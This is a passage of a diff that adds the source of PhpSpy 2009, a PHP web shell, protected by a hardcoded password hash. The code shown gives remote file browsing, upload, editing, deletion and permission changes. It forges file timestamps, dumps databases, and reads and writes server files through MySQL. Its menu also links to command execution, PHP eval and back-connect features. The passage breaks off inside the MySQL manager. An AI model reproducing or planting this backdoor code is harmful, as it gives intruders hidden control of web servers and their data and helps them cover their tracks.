+	foreach($$_request as $_key => $_value) {
+		if ($_key{0} != '_') {
+			if (IS_GPC) {
+				$_value = s_array($_value);
+			}
+			$$_key = $_value;
+		}
+	}
+}
+/*===================== ³ÌÐòÅäÖà =====================*/
+$admin = array();
+// ÊÇ·ñÐèÒªÃÜÂëÑéÖ¤, true ΪÐèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎÞЧ
+$admin['check'] = true;
+// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë
+$admin['pass']  = 'f4f068e71e0d87bf0ad51e6214ab84e9'; //angel
+
+//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
+// cookie ǰ׺
+$admin['cookiepre'] = '';
+// cookie ×÷ÓÃÓò
+$admin['cookiedomain'] = '';
+// cookie ×÷Ó÷¾¶
+$admin['cookiepath'] = '/';
+// cookie ÓÐЧÆÚ
+$admin['cookielife'] = 86400;
+
+//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
+!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
+/*===================== ÅäÖýáÊø =====================*/
+
+$charsetdb = array(
+	'armscii8',
+	'ascii',
+	'big5',
+	'binary',
+	'cp1250',
+	'cp1251',
+	'cp1256',
+	'cp1257',
+	'cp850',
+	'cp852',
+	'cp866',
+	'cp932',
+	'dec8',
+	'eucjpms',
+	'euckr',
+	'gb2312',
+	'gbk',
+	'geostd8',
+	'greek',
+	'hebrew',
+	'hp8',
+	'keybcs2',
+	'koi8r',
+	'koi8u',
+	'latin1',
+	'latin2',
+	'latin5',
+	'latin7',
+	'macce',
+	'macroman',
+	'sjis',
+	'swe7',
+	'tis620',
+	'ucs2',
+	'ujis',
+	'utf8'
+);
+if ($charset == 'utf8') {
+	header("content-Type: text/html; charset=utf-8");
+} elseif ($charset == 'big5') {
+	header("content-Type: text/html; charset=big5");
+} elseif ($charset == 'gbk') {
+	header("content-Type: text/html; charset=gbk");
+} elseif ($charset == 'latin1') {
+	header("content-Type: text/html; charset=iso-8859-2");
+} elseif ($charset == 'euckr') {
+	header("content-Type: text/html; charset=euc-kr");
+} elseif ($charset == 'eucjpms') {
+	header("content-Type: text/html; charset=euc-jp");
+}
+
+$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
+$timestamp = time();
+
+/*===================== Éí·ÝÑéÖ¤ =====================*/
+if ($action == "logout") {
+	scookie('loginpass', '', -86400 * 365);
+	p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+	p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+	exit;
+}
+if($admin['check']) {
+	if ($doing == 'login') {
+		if ($admin['pass'] == md5($password)) {
+			scookie('loginpass', md5($password));
+			p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
+			p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
+			exit;
+		}
+	}
+	if ($_COOKIE['loginpass']) {
+		if ($_COOKIE['loginpass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+$errmsg = '';
+
+// ²é¿´PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+		exit;
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+// ÏÂÔØÎļþ
+if ($doing == 'downfile' && $thefile) {
+	if (!@file_exists($thefile)) {
+		$errmsg = 'The file you want Downloadable was nonexistent';
+	} else {
+		$fileinfo = pathinfo($thefile);
+		header('Content-type: application/x-'.$fileinfo['extension']);
+		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+		header('Content-Length: '.filesize($thefile));
+		@readfile($thefile);
+		exit;
+	}
+}
+
+// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
+if ($doing == 'backupmysql' && !$saveasfile) {
+	mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+	$table = array_flip($table);
+	$result = q("SHOW tables");
+	if (!$result) p('<h2>'.mysql_error().'</h2>');
+	$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata .= sqldumptable($currow[0]);
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// ͨ¹ýMYSQLÏÂÔØÎļþ
+if($doing=='mysqldown'){
+	if (!$dbname) {
+		$errmsg = 'Please input dbname';
+	} else {
+		mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
+		if (!file_exists($mysqldlfile)) {
+			$errmsg = 'The file you want Downloadable was nonexistent';
+		} else {
+			$result = q("select load_file('$mysqldlfile');");
+			if(!$result){
+				q("DROP TABLE IF EXISTS tmp_angel;");
+				q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
+				//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
+				q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
+				$result = q("select content from tmp_angel");
+				q("DROP TABLE tmp_angel");
+			}
+			$row = @mysql_fetch_array($result);
+			if (!$row) {
+				$errmsg = 'Load file failed '.mysql_error();
+			} else {
+				$fileinfo = pathinfo($mysqldlfile);
+				header('Content-type: application/x-'.$fileinfo['extension']);
+				header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
+				header("Accept-Length: ".strlen($row[0]));
+				echo $row[0];
+				exit;
+			}
+		}
+	}
+}
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gbk">
+<title><?php echo str_replace('.','','P.h.p.S.p.y');?></title>
+<style type="text/css">
+body,td{font: 12px Arial,Tahoma;line-height: 16px;}
+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
+.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
+a {color: #00f;text-decoration:underline;}
+a:hover{color: #f00;text-decoration:none;}
+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
+.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
+.head td span{font-weight:normal;}
+form{margin:0;padding:0;}
+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
+</style>
+<script type="text/javascript">
+function CheckAll(form) {
+	for(var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function $(id) {
+	return document.getElementById(id);
+}
+function goaction(act){
+	$('goaction').action.value=act;
+	$('goaction').submit();
+}
+</script>
+</head>
+<body style="margin:0;table-layout:fixed; word-break:break-all">
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr class="head">
+		<td><span style="float:right;"><a href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> Ver: 2009 Build 20081222</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
+	</tr>
+	<tr class="alt1">
+		<td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
+			<a href="javascript:goaction('logout');">Logout</a> | 
+			<a href="javascript:goaction('file');">File Manager</a> | 
+			<a href="javascript:goaction('mysqladmin');">MYSQL Manager</a> | 
+			<a href="javascript:goaction('mssqladmin');">MSSQL Manager</a> | 
+			<a href="javascript:goaction('sqlfile');">MySQL Upload &amp; Download</a> | 
+			<a href="javascript:goaction('shell');">Execute Command</a> | 
+			<a href="javascript:goaction('phpenv');">PHP Variable</a> | 
+			<a href="javascript:goaction('eval');">Eval PHP Code</a>
+			<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
+		</td>
+	</tr>
+</table>
+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
+<?php
+
+formhead(array('name'=>'goaction'));
+makehide('action');
+formfoot();
+
+$errmsg && m($errmsg);
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!$dir) {
+	if ($_SERVER["DOCUMENT_ROOT"]) {
+		$dir = $_SERVER["DOCUMENT_ROOT"];
+	} else {
+		$dir = '.';
+	}
+}
+
+$nowpath = getPath(SA_ROOT, $dir);
+if (substr($dir, -1) != '/') {
+	$dir = $dir.'/';
+}
+$uedir = ue($dir);
+
+if (!$action || $action == 'file') {
+
+	// Åж϶ÁдÇé¿ö
+	$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
+
+	// ɾ³ýĿ¼
+	if ($doing == 'deldir' && $thefile) {
+		if (!file_exists($thefile)) {
+			m($thefile.' directory does not exist');
+		} else {
+			m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
+		}
+	}
+
+	// ´´½¨Ä¿Â¼
+	elseif ($newdirname) {
+		$mkdirs = $nowpath.$newdirname;
+		if (file_exists($mkdirs)) {
+			m('Directory has already existed');
+		} else {
+			m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
+			@chmod($mkdirs,0777);
+		}
+	}
+
+	// ÉÏ´«Îļþ
+	elseif ($doupfile) {
+		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
+	}
+
+	// ±à¼­Îļþ
+	elseif ($editfilename && $filecontent) {
+		$fp = @fopen($editfilename,'w');
+		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
+		@fclose($fp);
+	}
+
+	// ±à¼­ÎļþÊôÐÔ
+	elseif ($pfile && $newperm) {
+		if (!file_exists($pfile)) {
+			m('The original file does not exist');
+		} else {
+			$newperm = base_convert($newperm,8,10);
+			m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
+		}
+	}
+
+	// ¸ÄÃû
+	elseif ($oldname && $newfilename) {
+		$nname = $nowpath.$newfilename;
+		if (file_exists($nname) || !file_exists($oldname)) {
+			m($nname.' has already existed or original file does not exist');
+		} else {
+			m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
+		}
+	}
+
+	// ¸´ÖÆÎļþ
+	elseif ($sname && $tofile) {
+		if (file_exists($tofile) || !file_exists($sname)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
+		}
+	}
+
+	// ¿Ë¡ʱ¼ä
+	elseif ($curfile && $tarfile) {
+		if (!@file_exists($curfile) || !@file_exists($tarfile)) {
+			m('The goal file has already existed or original file does not exist');
+		} else {
+			$time = @filemtime($tarfile);
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ×Ô¶¨Òåʱ¼ä
+	elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
+		if (!@file_exists($curfile)) {
+			m(basename($curfile).' does not exist');
+		} else {
+			$time = strtotime("$year-$month-$day $hour:$minute:$second");
+			m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
+		}
+	}
+
+	// ´ò°üÏÂÔØ
+	elseif($doing == 'downrar') {
+		if ($dl) {
+			$dfiles='';
+			foreach ($dl as $filepath => $value) {
+				$dfiles.=$filepath.',';
+			}
+			$dfiles=substr($dfiles,0,strlen($dfiles)-1);
+			$dl=explode(',',$dfiles);
+			$zip=new PHPZip($dl);
+			$code=$zip->out;
+			header('Content-type: application/octet-stream');
+			header('Accept-Ranges: bytes');
+			header('Accept-Length: '.strlen($code));
+			header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
+			echo $code;
+			exit;
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	// ÅúÁ¿É¾³ýÎļþ
+	elseif($doing == 'delfiles') {
+		if ($dl) {
+			$dfiles='';
+			$succ = $fail = 0;
+			foreach ($dl as $filepath => $value) {
+				if (@unlink($filepath)) {
+					$succ++;
+				} else {
+					$fail++;
+				}
+			}
+			m('Deleted file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
+		} else {
+			m('Please select file(s)');
+		}
+	}
+
+	//²Ù×÷Íê±Ï
+	formhead(array('name'=>'createdir'));
+	makehide('newdirname');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileperm'));
+	makehide('newperm');
+	makehide('pfile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'copyfile'));
+	makehide('sname');
+	makehide('tofile');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'rename'));
+	makehide('oldname');
+	makehide('newfilename');
+	makehide('dir',$nowpath);
+	formfoot();
+	formhead(array('name'=>'fileopform', 'target'=>'_blank'));
+	makehide('action');
+	makehide('opfile');
+	makehide('dir');
+	formfoot();
+	formhead(array('name'=>'getsize'));
+	makehide('getdir');
+	makehide('dir');
+	formfoot();
+
+	$free = @disk_free_space($nowpath);
+	!$free && $free = 0;
+	$all = @disk_total_space($nowpath);
+	!$all && $all = 0;
+	$used = $all-$free;
+	$used_percent = @round(100/($all/$free),2);
+	p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
+
+?>
+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
+  <form action="" method="post" id="godir" name="godir">
+  <tr>
+    <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
+	<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
+    <td nowrap><input class="bt" value="GO" type="submit"></td>
+  </tr>
+  </form>
+</table>
+<script type="text/javascript">
+function createdir(){
+	var newdirname;
+	newdirname = prompt('Please input the directory name:', '');
+	if (!newdirname) return;
+	$('createdir').newdirname.value=newdirname;
+	$('createdir').submit();
+}
+function fileperm(pfile){
+	var newperm;
+	newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
+	if (!newperm) return;
+	$('fileperm').newperm.value=newperm;
+	$('fileperm').pfile.value=pfile;
+	$('fileperm').submit();
+}
+function copyfile(sname){
+	var tofile;
+	tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
+	if (!tofile) return;
+	$('copyfile').tofile.value=tofile;
+	$('copyfile').sname.value=sname;
+	$('copyfile').submit();
+}
+function rename(oldname){
+	var newfilename;
+	newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
+	if (!newfilename) return;
+	$('rename').newfilename.value=newfilename;
+	$('rename').oldname.value=oldname;
+	$('rename').submit();
+}
+function dofile(doing,thefile,m){
+	if (m && !confirm(m)) {
+		return;
+	}
+	$('filelist').doing.value=doing;
+	if (thefile){
+		$('filelist').thefile.value=thefile;
+	}
+	$('filelist').submit();
+}
+function createfile(nowpath){
+	var filename;
+	filename = prompt('Please input the file name:', '');
+	if (!filename) return;
+	opfile('editfile',nowpath + filename,nowpath);
+}
+function opfile(action,opfile,dir){
+	$('fileopform').action.value=action;
+	$('fileopform').opfile.value=opfile;
+	$('fileopform').dir.value=dir;
+	$('fileopform').submit();
+}
+function godir(dir,view_writable){
+	if (view_writable) {
+		$('godir').view_writable.value=view_writable;
+	}
+	$('godir').dir.value=dir;
+	$('godir').submit();
+}
+function getsize(getdir,dir){
+	$('getsize').getdir.value=getdir;
+	$('getsize').dir.value=dir;
+	$('getsize').submit();
+}
+</script>
+  <?php
+	$findstr = $_POST['findstr'];
+	$re = $_POST['re'];
+	tbhead();
+	p('<tr class="alt1"><td colspan="7" style="padding:5px;line-height:20px;">');
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div></form>');
+	p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
+	p(' | <a href="javascript:godir(\'.\');">ScriptPath</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
+	p(' | View Writable ( <a href="javascript:godir(\''.$nowpath.'\',\'dir\');">Directory</a>');
+	p(' | <a href="javascript:godir(\''.$nowpath.'\',\'file\');">File</a> )');
+	p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
+	if (IS_WIN && IS_COM) {
+		$obj = new COM('scripting.filesystemobject');
+		if ($obj && is_object($obj) && is_array($obj->Drives)) {
+			$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
+			foreach($obj->Drives as $drive) {
+				if ($drive->DriveType == 2) {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'&#13;Free:'.sizecount($drive->FreeSpace).'&#13;Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				} else {
+					p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
+				}
+			}
+		}
+	}
+
+	p('<br /><form action="'.$self.'" method="POST">Find string in files(current folder): <input class="input" name="findstr" value="'.$findstr.'" type="text" /> <input class="bt" value="Find" type="submit" /> Type: <input class="input" name="writabledb" value="'.$writabledb.'" type="text" /><input name="dir" value="'.$dir.'" type="hidden" /> <input name="re" value="1" type="checkbox" '.($re ? 'checked' : '').' /> Regular expressions</form></td></tr>');
+
+	p('<tr class="head"><td>&nbsp;</td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
+
+	//²é¿´ËùÓпÉдÎļþºÍĿ¼
+	$dirdata=array();
+	$filedata=array();
+
+	if ($view_writable == 'dir') {
+		$dirdata = GetWDirList($nowpath);
+		$filedata = array();
+	} elseif ($view_writable == 'file') {
+		$dirdata = array();
+		$filedata = GetWFileList($nowpath);
+	} elseif ($findstr) {
+		$dirdata = array();
+		$filedata = GetSFileList($nowpath, $findstr, $re);
+	} else {
+		// Ŀ¼Áбí
+		$dirs=@opendir($dir);
+		while ($file=@readdir($dirs)) {
+			$filepath=$nowpath.$file;
+			if(@is_dir($filepath)){
+				$dirdb['filename']=$file;
+				$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$dirdb['dirchmod']=getChmod($filepath);
+				$dirdb['dirperm']=getPerms($filepath);
+				$dirdb['fileowner']=getUser($filepath);
+				$dirdb['dirlink']=$nowpath;
+				$dirdb['server_link']=$filepath;
+				$dirdb['client_link']=ue($filepath);
+				$dirdata[]=$dirdb;
+			} else {		
+				$filedb['filename']=$file;
+				$filedb['size']=sizecount(@filesize($filepath));
+				$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
+				$filedb['filechmod']=getChmod($filepath);
+				$filedb['fileperm']=getPerms($filepath);
+				$filedb['fileowner']=getUser($filepath);
+				$filedb['dirlink']=$nowpath;
+				$filedb['server_link']=$filepath;
+				$filedb['client_link']=ue($filepath);
+				$filedata[]=$filedb;
+			}
+		}// while
+		unset($dirdb);
+		unset($filedb);
+		@closedir($dirs);
+	}
+	@sort($dirdata);
+	@sort($filedata);
+	$dir_i = '0';
+
+	foreach($dirdata as $key => $dirdb){
+		if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
+			if($getdir && $getdir == $dirdb['server_link']) {
+				$attachsize = dirsize($dirdb['server_link']);
+				$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
+			} else {
+				$attachsize = '<a href="javascript:getsize(\''.$dirdb['server_link'].'\',\''.$dir.'\');">Stat</a>';
+			}
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
+			p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
+			p('<td nowrap>'.$dirdb['mtime'].'</td>');
+			p('<td nowrap>'.$attachsize.'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
+			p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete <'.$dirdb['filename'].'>? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
+			p('</tr>');
+			$dir_i++;
+		} else {
+			if($dirdb['filename']=='..') {
+				p('<tr class='.bg().'>');
+				p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
+				p('</tr>');
+			}
+		}
+	}
+
+	p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
+	p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
+	makehide('action','file');
+	makehide('thefile');
+	makehide('doing');
+	makehide('dir',$nowpath);
+	$file_i = '0';
+
+	foreach($filedata as $key => $filedb){
+		if($filedb['filename']!='..' && $filedb['filename']!='.') {
+			$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
+			$thisbg = bg();
+			p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+			p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
+			p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
+			p('<td nowrap>'.$filedb['mtime'].'</td>');
+			p('<td nowrap>'.$filedb['size'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
+			p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
+			p('<td nowrap>');
+			p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
+			p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
+			p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
+			p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
+			p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
+			p('</td></tr>');
+			$file_i++;
+		}
+	}
+	p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
+	p('</form></table>');
+}// end dir
+
+elseif ($action == 'sqlfile') {
+	if($doing=="mysqlupload"){
+		$file = $_FILES['uploadfile'];
+		$filename = $file['tmp_name'];
+		if (file_exists($savepath)) {
+			m('The goal file has already existed');
+		} else {
+			if(!$filename) {
+				m('Please choose a file');
+			} else {
+				$fp=@fopen($filename,'r');
+				$contents=@fread($fp, filesize($filename));
+				@fclose($fp);
+				$contents = bin2hex($contents);
+				if(!$upname) $upname = $file['name'];
+				mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+				$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
+				m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
+			}
+		}
+	}
+?>
+<script type="text/javascript">
+function mysqlfile(doing){
+	if(!doing) return;
+	$('doing').value=doing;
+	$('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
+	$('mysqlfile').dbport.value=$('dbinfo').dbport.value;
+	$('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
+	$('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
+	$('mysqlfile').dbname.value=$('dbinfo').dbname.value;
+	$('mysqlfile').charset.value=$('dbinfo').charset.value;
+	$('mysqlfile').submit();
+}
+</script>
+<?php
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
+	makehide('action','sqlfile');
+	p('<p>');
+	p('DBHost:');
+	makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
+	p(':');
+	makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
+	p('DBUser:');
+	makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
+	p('DBPass:');
+	makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
+	p('DBName:');
+	makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
+	p('DBCharset:');
+	makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
+	p('</p>');
+	formfoot();
+	p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
+	p('<h2>Upload file</h2>');
+	p('<p><b>This operation the DB user must has FILE privilege</b></p>');
+	p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
+	p('<h2>Download file</h2>');
+	p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
+	makehide('dbhost');
+	makehide('dbport');
+	makehide('dbuser');
+	makehide('dbpass');
+	makehide('dbname');
+	makehide('charset');
+	makehide('doing');
+	makehide('action','sqlfile');
+	p('</form>');
+}
+
+elseif ($action == 'mysqladmin') {
+	!$dbhost && $dbhost = 'localhost';
+	!$dbuser && $dbuser = 'root';
+	!$dbport && $dbport = '3306';
+	$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
+	if(isset($dbhost)){
+		$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
+	}
+	if(isset($dbuser)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
+	}
+	if(isset($dbpass)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
+	}
+	if(isset($dbport)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
+	}
+	if(isset($dbname)) {
+		$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
+	}
+	if(isset($charset)) {
+		$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
+	}
+
+	if ($doing == 'backupmysql' && $saveasfile) {
+		if (!$table) {
+			m('Please choose the table');
+		} else {
+			mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
+			$table = array_flip($table);
+			$fp = @fopen($path,'w');
+			if ($fp) {
+				$result = q('SHOW tables');
+				if (!$result) p('<h2>'.mysql_error().'</h2>');
+				$mysqldata = '';
+				while ($currow = mysql_fetch_array($result)) {
+					if (isset($table[$currow[0]])) {
+						sqldumptable($currow[0], $fp);
+					}
+				}
+				fclose($fp);
+				$fileurl = str_replace(SA_ROOT,'',$path);
+				m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
+				mysql_close();
+			} else {
+				m('Backup failed');
+			}
+		}
+	}
+	if ($insert && $insertsql) {
+		$keystr = $valstr = $tmp = '';
+		foreach($insertsql as $key => $val) {
+			if ($val) {
+				$keystr .= $tmp.$key;
